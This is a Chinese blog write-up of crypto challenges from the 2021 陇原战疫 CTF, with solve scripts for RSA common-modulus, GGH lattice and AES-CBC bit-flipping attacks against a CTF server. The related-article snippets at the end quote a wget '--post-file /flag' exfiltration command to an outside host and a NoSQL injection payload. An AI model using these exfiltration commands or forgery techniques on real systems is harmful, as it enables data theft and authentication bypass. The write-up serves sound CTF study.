陇原战疫2021网络安全大赛_Crypto_复现

已于 2022-02-28 11:49:10 修改
阅读量6.9k 收藏
点赞数 3
分类专栏: CTF比赛复现 文章标签: Crypto python
于 2022-02-28 11:47:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51999772/article/details/123179160
版权

陇原战疫2021网络安全大赛_Crypto_复现

mostlycommon

k e y w o r d s : keywords: keywords: 共模攻击

D e c r y p t i o n   c o d e Decryption~code Decryption code

from Crypto.Util.number import *
import gmpy2

e1 = 65536
e2 = 270270
n = 122031686138696619599914690767764286094562842112088225311503826014006886039069083192974599712685027825111684852235230039182216245029714786480541087105081895339251403738703369399551593882931896392500832061070414483233029067117410952499655482160104027730462740497347212752269589526267504100262707367020244613503
c1 = 39449016403735405892343507200740098477581039605979603484774347714381635211925585924812727991400278031892391996192354880233130336052873275920425836986816735715003772614138146640312241166362203750473990403841789871473337067450727600486330723461100602952736232306602481565348834811292749547240619400084712149673
c2 = 43941404835820273964142098782061043522125350280729366116311943171108689108114444447295511969090107129530187119024651382804933594308335681000311125969011096172605146903018110328309963467134604392943061014968838406604211996322468276744714063735786505249416708394394169324315945145477883438003569372460172268277

_,s,t = gmpy2.gcdext(e1,e2)
print(s,t)
m = pow(c1,s,n) * pow(c2,t,n) % n
print(gmpy2.gcd(e1,e2))
print(bytes.decode(long_to_bytes(gmpy2.iroot(m,2)[0])))

easytask

k e y w o r d s : keywords: keywords: GGHembedded technique

解题细节思路请见paper,(20条消息) GGH非对称密码体制破解方法_M3ng@L的博客-CSDN博客

简单来说,使用embedded technique方法将 C V P CVP CVP问题转换为 S V P SVP SVP问题,进而求得干扰向量 e e e的大小,减去 e e e再乘以公钥向量 B ′ B' B的逆即可

D e c r y p t i o n   c o d e Decryption~code Decryption code

from sage.modules.free_module_integer import IntegerLattice
c = e = [151991736758354,115130361237591,58905390613532,130965235357066,74614897867998,48099459442369,45894485782943,7933340009592,25794185638]
B = W = [[-10150241248,-11679953514,-8802490385,-12260198788,-10290571893,-334269043,-11669932300,-2158827458,-7021995],
[52255960212,48054224859,28230779201,43264260760,20836572799,8191198018,14000400181,4370731005,14251110],
[2274129180,-1678741826,-1009050115,1858488045,978763435,4717368685,-561197285,-1999440633,-6540190],
[45454841384,34351838833,19058600591,39744104894,21481706222,14785555279,13193105539,2306952916,7501297],
[-16804706629,-13041485360,-8292982763,-16801260566,-9211427035,-4808377155,-6530124040,-2572433293,-8393737],
[28223439540,19293284310,5217202426,27179839904,23182044384,10788207024,18495479452,4007452688,13046387],
[968256091,-1507028552,1677187853,8685590653,9696793863,2942265602,10534454095,2668834317,8694828],
[33556338459,26577210571,16558795385,28327066095,10684900266,9113388576,2446282316,-173705548,-577070],
[35404775180,32321129676,15071970630,24947264815,14402999486,5857384379,10620159241,2408185012,7841686]]

c = matrix(c)
B = matrix(B)
temp = B.stack(c).augment(vector([0]*B.ncols()+[1]))
e = IntegerLattice(temp).shortest_vector()[:-1]
m = B.solve_left(c - matrix(e))
print(m)
m = [ 877  619  919  977  541  941  947 1031  821]

from Crypto.Util.number import *
from Crypto.Cipher import AES
import hashlib
c = 0x1070260d8986d5e3c4b7e672a6f1ef2c185c7fff682f99cc4a8e49cfce168aa0
m = [877,619,919,977,541,941,947,1031,821]
key = hashlib.sha256(str(m).encode()).digest()
aes = AES.new(key,AES.MODE_ECB)
flag = aes.decrypt(long_to_bytes(c))
print(flag)

P e r f e r e n c e Perference Perference

hxp |伏尔加CTF 2016资格:crypto300"XXY"写

Mathematics of Public Key Cryptography (auckland.ac.nz)

GGH | 4XWi11的博客

Nguyen’s Attack:Intended Solution to GGH in GYCTF 2020 | Soreat_u’s Blog (soreatu.com)

Civet cat for Prince

k e y w o r d s : keywords: keywords: AES_CBCxor狸猫换太子

D e s c r i p t i o n Description Description

from Crypto.Cipher import AES
import os
from hashlib import sha256
import socketserver
import signal
import string
import random

table = string.ascii_letters + string.digits
BANNER = br'''
 .d8888b.  d8b                   888                            888             
d88P  Y88b Y8P                   888                            888             
888    888                       888                            888             
888        888 888  888  .d88b.  888888        .d8888b  8888b.  888888          
888        888 888  888 d8P  Y8b 888          d88P"        "88b 888             
888    888 888 Y88  88P 88888888 888          888      .d888888 888             
Y88b  d88P 888  Y8bd8P  Y8b.     Y88b.        Y88b.    888  888 Y88b.           
 "Y8888P"  888   Y88P    "Y8888   "Y888        "Y8888P "Y888888  "Y888          
                                                                                
                                                                                
                                                                                
 .d888                        8888888b.          d8b                            
d88P"                         888   Y88b         Y8P                            
888                           888    888                                        
888888  .d88b.  888d888       888   d88P 888d888 888 88888b.   .d8888b  .d88b.  
888    d88""88b 888P"         8888888P"  888P"   888 888 "88b d88P"    d8P  Y8b 
888    888  888 888           888        888     888 888  888 888      88888888 
888    Y88..88P 888           888        888     888 888  888 Y88b.    Y8b.     
888     "Y88P"  888           888        888     888 888  888  "Y8888P  "Y8888
'''

guard_menu = br'''
1.Tell the guard my name
2.Go away
'''

cat_menu = br'''1.getpermission
2.getmessage
3.say Goodbye
'''


def Pad(msg):
    return msg + os.urandom((16 - len(msg) % 16) % 16)


class Task(socketserver.BaseRequestHandler):
    def _recvall(self):
        BUFF_SIZE = 2048
        data = b''
        while True:
            part = self.request.recv(BUFF_SIZE)
            data += part
            if len(part) < BUFF_SIZE:
                break
        return data.strip()

    def send(self, msg, newline=True):
        try:
            if newline:
                msg += b'\n'
            self.request.sendall(msg)
        except:
            pass

    def recv(self, prompt=b'[-] '):
        self.send(prompt, newline=False)
        return self._recvall()

    def proof_of_work(self):
        proof = (''.join([random.choice(table) for _ in range(12)])).encode()
        sha = sha256(proof).hexdigest().encode()
        self.send(b"[+] sha256(XXXX+" + proof[4:] + b") == " + sha)
        XXXX = self.recv(prompt=b'[+] Give Me XXXX :')
        if len(XXXX) != 4 or sha256(XXXX + proof[4:]).hexdigest().encode() != sha:
            return False
        return True

    def register(self):
        self.send(b'')
        username = self.recv()
        return username

    def getpermission(self, name, iv, key):
        aes = AES.new(key, AES.MODE_CBC, iv)
        plain = Pad(name)+b"a_cat_permission"
        return aes.encrypt(plain)

    def getmessage(self, iv, key, permission):
        aes = AES.new(key, AES.MODE_CBC, iv)
        return aes.decrypt(permission)

    def handle(self):
        signal.alarm(50)
        if not self.proof_of_work():
            return
        self.send(BANNER, newline=False)
        self.key = os.urandom(16)
        self.iv = os.urandom(16)
        self.send(b"I'm the guard, responsible for protecting the prince's safety.")
        self.send(b"You shall not pass, unless you have the permission of the prince.")
        self.send(b"You have two choices now. Tell me who you are or leave now!")
        self.send(guard_menu, newline=False)
        option = self.recv()
        if option == b'1':
            try:
                self.name = self.register()
                self.send(b"Hello " + self.name)
                self.send(b"Nice to meet you. But I can't let you pass. I can give you a cat. She will play with you")
                self.send(b'Miao~ ' + self.iv)
                for i in range(3):
                    self.send(b"I'm a magic cat. What can I help you")
                    self.send(cat_menu, newline=False)
                    op = self.recv()
                    if op == b'1':
                        self.send(b"Looks like you want permission. Here you are~")
                        permission = self.getpermission(self.name, self.iv, self.key)
                        self.send(b"Permission:" + permission)
                    elif op == b'2':
                        self.send(b"Looks like you want to know something. Give me your permission:")
                        permission = self.recv()
                        self.send(b"Miao~ ")
                        iv = self.recv()
                        plain = self.getmessage(iv, self.key, permission)
                        self.send(b"The message is " + plain)
                    elif op == b'3':
                        self.send(b"I'm leaving. Bye~")
                        break
                self.send(b"Oh, you're here again. Let me check your permission.")
                self.send(b"Give me your permission:")
                cipher = self.recv()
                self.send(b"What's the cat tell you?")
                iv = self.recv()
                plain = self.getmessage(iv, self.key, cipher)
                prs, uid = plain[16:],plain[:16]
                if prs != b'Princepermission' or uid != self.name:
                    self.send(b"You don't have the Prince Permission. Go away!")
                    return
                else:
                    self.send(b"Unbelievable! How did you get it!")
                    self.send(b"The prince asked me to tell you this:")
                    f = open('flag.txt', 'rb')
                    flag = f.read()
                    f.close()
                    self.send(flag)
            except:
                self.request.close()
        if option == b'2':
            self.send(b"Stay away from here!")
        self.request.close()


class ThreadedServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    pass


class ForkedServer(socketserver.ForkingMixIn, socketserver.TCPServer):
    pass


if __name__ == "__main__":
    HOST, PORT = '0.0.0.0', 10005
    print("HOST:POST " + HOST + ":" + str(PORT))
    server = ForkedServer((HOST, PORT), Task)
    server.allow_reuse_address = True
    server.serve_forever()

A n a l y s i s Analysis Analysis

首先是执行proof of work函数,简单的爆破四个字符使得其连接上剩余已知字符的sha256等于函数给出的sha256

然后进入正题,第一段守卫处没有有用信息,需要输入你的name(之后称为m1),然后在magic cat处可以获得

  • getpermission()

得到对m1+b'a_cat_permission'的AES_CBC加密之后得到的密文,其中iv是系统生成的已知量,key未知

    def getpermission(self, name, iv, key):
        aes = AES.new(key, AES.MODE_CBC, iv)
        plain = Pad(name)+b"a_cat_permission"
        return aes.encrypt(plain)
  • getmessage()

输入一段密文进行AES_CBC解密,其中iv由我们给出,key是之前使用的,得到解密之后给出的明文

    def getmessage(self, iv, key, permission):
        aes = AES.new(key, AES.MODE_CBC, iv)
        return aes.decrypt(permission)

总共有三次询问的机会(循环次数为3),循环完成之后由守卫进行验证

提交给守卫某个密文和自己给出的偏移量iv,使得进行相同的key的AES_CBC解密之后得到的明文是m1+b'Princeperimission'

self.send(b"Give me your permission:")
cipher = self.recv()
self.send(b"What's the cat tell you?")
iv = self.recv()
plain = self.getmessage(iv, self.key, cipher)
prs, uid = plain[16:],plain[:16]
if prs != b'Princepermission' or uid != self.name:
    ...

以上就是对题目代码的分析

简单来说,我们需要想办法把从magic cat处得到的perimission = m1 + b'a_cat_perimission'的密文换成m1 + b'Princepermission'的密文

其中可以用到的是magic cat会提供一次或两次解密的机会(用自己给出的iv

显然没有办法知道key进而直接求解,但是我们不需要老老实实地直接找 n e e d _ m 1 + n e e d _ m 2 need\_m_1+need\_m_2 need_m1+need_m2的密文,因为我们可以构造合适的iv代入最后的AES_CBC解密

先令

m 1 = i n p u t _ n a m e m_1 = input\_name m1=input_name

m 2 = a _ c a t _ p e r m i s s i o n m_2 = a\_cat\_permission m2=a_cat_permission

n e e d _ m 1 = m 1 need\_m_1=m_1 need_m1=m1

n e e d _ m 2 = P r i n c e p e r m i s s i o n need\_m_2=Princepermission need_m2=Princepermission

由于AES_CBC加密是分块加密,而每一块的大小是128bits也就是16字节,而由于题目要求, m 1 m_1 m1 m 2 m_2 m2以及 n e e d _ m 2 need\_m_2 need_m2都是16字节大小的

这就意味着加密得到的密文块会有特殊的性质

c 1 = p e r m i s s i o n [ : 16 ] c_1=permission[:16] c1=permission[:16] c 2 = p e r m i s s i o n [ 16 : ] c_2=permission[16:] c2=permission[16:];其中 p e r m i s s i o n permission permissionmagic cat通过getpermission()给出的密文

通过图片明确一下AES_CBC加解密过程

加密过程是,先将明文按16字节一分组拆开,然后进行如图加密(先进行异或,非明文分组1的异或对象是前一个密文分组或者是明文分组1的异或对象初始化向量iv),再分别投入加密器,得到各个密文分组后拼接起来成为最后的密文

解密过程是,将密文按16字节一分组拆开,然后分别投入解密器,得到的结果与前一个密文分组或者初始化向量进行异或,最后得到各个明文分组再直接拼接在一起组成最后的明文

其中加密器和解密器在本题算是黑盒,只需要知道进去的数据和原来是不一样的即可

我们构造的密文要先经过一次解密器,这就意味着非经过AES_CBC加密产生的密文(比如 c 1 , c 2 c_1,c_2 c1,c2)都会产生一个未知的数据;那么这时就需要用到magic cat提供的解密的机会

经过解密器之后会进行异或,那么这就是本题的关键之一了,异或的性质就是两个一样的数异或均为0,也就是说对其他一起的数不会有影响,利用这个性质我们构造

f a k e _ c 1 = c 1 ⊕ m 2 ⊕ n e e d _ m 2 fake\_c_1=c_1\oplus m_2\oplus need\_m_2 fake_c1=c1m2need_m2

使用系统给出的iv代入magic cat提供的一次解密的机会

先经过解密器得到 m 1 ⊕ i v ⊕ d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 m_1\oplus iv\oplus decrypted\_m_2\oplus decrypted\_need\_m_2 m1ivdecrypted_m2decrypted_need_m2

在与初始化向量iv异或得到 m = m 1 ⊕ d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 m=m_1\oplus decrypted\_m_2\oplus decrypted\_need\_m_2 m=m1decrypted_m2decrypted_need_m2

接着构造

f a k e _ i v = m ⊕ m 1 ⊕ i v = d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 ⊕ i v fake\_iv=m\oplus m_1\oplus iv=decrypted\_m_2\oplus decrypted\_need\_m_2\oplus iv fake_iv=mm1iv=decrypted_m2decrypted_need_m2iv

那么最后传入的密文是 f a k e _ c 1 + c 2 fake\_c_1+c_2 fake_c1+c2,传入的iv也就是 f a k e _ i v fake\_iv fake_iv

推导一下最后的解密过程,(AES_CBC是分块解密的)

f a k e _ c 1 fake\_c_1 fake_c1单独进行解密得到 m 1 ⊕ i v ⊕ d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 m_1\oplus iv\oplus decrypted\_m_2\oplus decrypted\_need\_m_2 m1ivdecrypted_m2decrypted_need_m2

然后再与 f a k e _ i v fake\_iv fake_iv异或得到

m 1 ⊕ i v ⊕ d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 ⊕ d e c r y p t e d _ m 2 ⊕ d e c r y p t e d _ n e e d _ m 2 ⊕ i v m_1\oplus iv\oplus decrypted\_m_2\oplus decrypted\_need\_m_2\oplus decrypted\_m_2\oplus decrypted\_need\_m_2\oplus iv m1ivdecrypted_m2decrypted_need_m2decrypted_m2decrypted_need_m2iv

= m 1 =m_1 =m1

得到明文分组1,符合最后的判断条件

然后 c 2 c_2 c2单独进行解密,得到 c 1 ⊕ m 2 c_1\oplus m_2 c1m2

再与 f a k e _ c 1 fake\_c_1 fake_c1进行异或得到 c 1 ⊕ m 2 ⊕ n e e d _ m 2 ⊕ c 1 ⊕ m 2 = n e e d _ m 2 c_1\oplus m_2\oplus need\_m_2 \oplus c_1\oplus m_2=need\_m_2 c1m2need_m2c1m2=need_m2

这就是明文分组2,符合最后的判断条件

D e c r y p t i o n   c o d e Decryption~code Decryption code

from re import L
from pwn import *
import hashlib,string,random
from Crypto.Cipher import AES

io = remote("node4.buuoj.cn","27370")
temp = io.recvline()
# print(temp)
temp1 = temp.split(b"==")
# print(temp1)
part_proof = bytes.decode(temp1[0].split(b"XXXX")[1])[1:-2]
sha = bytes.decode(temp1[1]).strip()
table = string.ascii_letters + string.digits
while True:
    XXXX = "".join([random.choice(table)for _ in range(4)])
    temp_proof = XXXX + part_proof
    temp_sha = hashlib.sha256(temp_proof.encode()).hexdigest()
    if sha == temp_sha:
        io.recvuntil(b"[+] Give Me XXXX :")
        io.sendline(XXXX.encode())
        break
io.recvuntil(b"[-] ")
io.sendline(b"1")
io.sendline(b"1" * 16)
io.recvuntil(b'Miao~ ')
iv = io.recvuntil(b"\n")[:-1]
# print(iv)
io.recvuntil(b'[-]')
io.sendline(b'1')
io.recvuntil(b'Permission:')
cat_permission = io.recvline()[:-1]
# print(cat_permission)
io.recvuntil(b"[-]")
io.sendline(b'2')
io.recvuntil(b"Looks like you want to know something. Give me your permission:")

m2 = b"a_cat_permission"
m1 = b'1' * 16 # your name,直接16字节,不会进行pad()函数,如果那样的话,m1也会成为一个未知量
need_m2 = b"Princepermission"
need_m1 = m1
c1 = cat_permission[:16]
c2 = cat_permission[16:]
fake_c1 = xor(xor(c1,m2),need_m2)

io.sendline(fake_c1)
io.recvuntil(b"Miao~ ")
io.sendline(iv)
io.recvuntil(b"The message is ")
m = io.recvuntil(b"\n")[:-1]
# print(plain)
io.recvuntil(b"[-]")
io.sendline(b'3')
io.recvuntil(b"Give me your permission:")

fake_permission = fake_c1 + c2
fake_iv = xor(xor(m,m1),iv)

io.sendline(fake_permission)
io.recvuntil(b"What's the cat tell you?")
io.sendline(fake_iv)
io.interactive()

P e r f e r e n c e Perference Perference

完美起航-20211107陇原战疫Crypto方向WP (okgoes.cn)

(11条消息) CBC模式解读_实践求真知-CSDN博客_cbc模式

M3ng@L
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
AUTOSAR_MCAL_CRYPTO.zip
08-14
This User Manual describes NXP Semiconductors AUTOSAR Crypto ( CRYPTO ) for S32K14X . AUTOSAR CRYPTO driver configuration parameters and deviations from the specification are described in CRYPTO ...
crypto++编程指南
09-01
密码学界的非常好的开源算法库,cryptopp的编程指南。接受了分组,哈希的使用方法。
陇原战疫2021网络安全大赛 Web
feng的博客
11-08 5512
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
陇原战"疫"2021网络安全大赛writeup
渗透测试研究中心
12-22 4306
Web1.Checkin解题思路这道题 前面根据 源码应该是 nosql注入,我分析的payload:username='||1){returntrue;}})//&password=123456盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimporttimeimportrequestsimportstringsession=reque...
陇原战“疫“2021网络安全大赛 Web EasyJaba
Sk1y的博客
07-02 1399
恶意字节码加载,Rome链,靶机不出网,使用Hashtable绕过入口类的限制,
陇原战“疫“2021网络安全大赛 Web eaaasyphp
Sk1y的博客
12-25 2868
eaaasyphp 文章目录eaaasyphp读取phpinfo打fastcgi恶意的ftp服务构造pop链参考链接 题目给出了源码 读取phpinfo 尝试反序列化读取phpinfo 但是__wakeup()函数先于destruct函数执行,所以需要绕过:__ PHP :: Bug #81151 :: bypass __wakeup ?code=C:4:"Hint":0:{} 注意这个FPM/FastCGI 打fastcgi 使用Gopherus生成打fastcgi的payload: gopher
陇原战“疫“2021网络安全大赛的一道web
errorr0
04-30 347
复现以前打过的比赛题
crypto1_bs-master_crypto1_bs_mifare_crypto1_
09-28
Crypto1算法,作为Mifare Classic系列卡片中广泛使用的加密算法,对于智能卡安全领域具有重要意义。此算法的复杂性使得它对初学者而言颇具挑战,但一旦掌握,便能有效提升在智能卡安全系统设计和分析上的能力。本文...
crypto_cryptoapi.rar_CRYPTO_Crypto++_cryptoAPI
09-14
本文将深入探讨标题为“crypto_cryptoapi.rar_CRYPTO_Crypto++_cryptoAPI”的主题,该主题涉及到一个用C++编写的加密库,用于封装微软的CryptoAPI(Cryptographic Application Programming Interface)。这个压缩包...
RSA.zip_Crypto++_crypto RSA_crypto rsa_rsa_rsa加密
09-14
RSA算法是一种非对称加密算法,它在信息安全领域扮演着重要的角色,特别是在数据加密、数字签名和密钥交换等方面。本篇文章将详细讲解RSA算法的基本原理、Crypto++库的使用以及如何利用Crypto++ v5.22实现RSA加密...
Crypto.zip_CRYPTO_Crypto++_mfc sample crypto_terriblent3_zip
07-14
标题 "Crypto.zip_CRYPTO_Crypto++_mfc sample crypto_terriblent3_zip" 提到的是一个包含加密示例代码的压缩文件,其中可能包括使用Crypto++库和MFC(Microsoft Foundation Classes)进行加密操作的代码。Crypto++...
陇原战“疫“2021网络安全大赛Writeup
Le1a's Blog
11-08 6181
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
陇原战“疫“2021网络安全大赛 bbbaby和Magic
zylxixixi的博客
11-17 341
一、bbbaby 首先对程序进行分析 ,程序较为简单,提供了修改地址内容和输入任意大小内容的功能,存在栈溢出的可能。 因为事情多,就看了眼题,最开始我想使用利用栈溢出再使用chk_stack_fail泄露出libc版本信息,虽然成功打印出libc地址但是已经退出了程序。参考了大佬陇原战疫2021网络安全大赛-pwn-wp - LynneHuan - 博客园 , 后面的思路为首先利用提供的修改地址内容的功能,将chk_stack_fail的got地址修改为puts的plt地址,然后通过栈溢出
陇原战“疫“2021网络安全大赛 Re
PMR的博客
11-15 4406
1、 EasyRe IDA载入附件,搜索字符串得 flag: FLAG:flag{fc5e038d38a57032085441e7fe7010b0} 2、 findme 常规的流程,flag的加密和校验都在 off_403844: 跟进去发现 指向strcmp: 然后它又被 sub_401A0E 动过,向上回溯: 所以我们的目标是 sub_401866: 大概看了一下,确定是 RC4,整体还是挺干净的就一个库函数 strlen,当时是想偷懒,用以前的Unicorn脚本改了一下直接跑出来的:
陇原战“疫“2021网络安全大赛 Web MagicMail
Sk1y的博客
11-19 3398
知识点:本地起一个smtp服务,利用模板注入,找到可用的类 文章目录MagicMail注入点测试模板注入参考链接 MagicMail 注入点 这个题目很有意思,赛后根据官方wp进行复现 首先是,我们需要输入一个有smtp服务的ip和相应的端口,这个可以在自己的vps起一个smtp服务 python3 -m smtpd -c DebuggingServer -n 0.0.0.0:6667 输入自己的服务器ip和6667(ip和port根据自己的情况修改) 然后就是一个可以发送邮件的功能 在email的内
11月陇原战疫2021网络安全大赛赛后部分web复现
qq_36410265的博客
12-27 2403
11月陇原战疫2021网络安全大赛赛后部分web复现
陇原战“疫“2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3215
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
陇原战“疫“2021网络安全大赛部分WP
七堇年的博客
12-24 2124
陇原战"疫"2021网络安全大赛WP
2021陇原战“疫”】crypto部分writeup
a5555678744的博客
11-09 1023
这次BUUCTF月赛对我来说确实还行了,不会太难,也能学到东西,主要想说说比特翻转攻击的问题,最近这种题碰的特别多,CBC的,CFB的,GCM的,各种各样的AES模式的攻击问题,从最基本的CBC开始,系统地搞个专题。 这次月赛的全面wp请看2021陇原战疫WP - n03tAck 我比较菜,就把简单的题细说下。 mostlycommon 不想多说,简单的共模攻击,只是两个加密指数的最大公因数是2,最后得到的结果开个平方就是flag了。 Civet cat for Prince(比特翻转攻击)
安装dbms_crypto
最新发布
05-26
DBMS_CRYPTO 是 Oracle 数据库中用于加密和解密数据的包。它是 Oracle Advanced Security 的一部分,需要在数据库中安装并启用才能使用。 以下是安装和启用 DBMS_CRYPTO 包的步骤: 1. 确认数据库中是否已安装 Oracle Advanced Security。可以通过执行以下查询来检查: ```sql SELECT * FROM v$option WHERE parameter = 'Advanced Security' ``` 如果查询结果中的 VALUE 为 'TRUE',则说明已安装 Oracle Advanced Security。 2. 如果数据库中未安装 Oracle Advanced Security,则需要安装它。可以参考 Oracle 官方文档中的相关说明进行安装。 3. 在需要使用 DBMS_CRYPTO 的数据库用户中授权 DBMS_CRYPTO 包。可以执行以下命令进行授权: ```sql GRANT EXECUTE ON SYS.DBMS_CRYPTO TO [database_user]; ``` 其中 [database_user] 为需要使用 DBMS_CRYPTO 的数据库用户。 4. 确认 DBMS_CRYPTO 包已启用。可以执行以下命令进行确认: ```sql SELECT * FROM dba_objects WHERE object_name = 'DBMS_CRYPTO' ``` 如果查询结果中的 STATUS 为 'VALID',则说明 DBMS_CRYPTO 包已启用。 完成以上步骤后,就可以在数据库中使用 DBMS_CRYPTO 包进行加密和解密操作了。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M3ng@L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值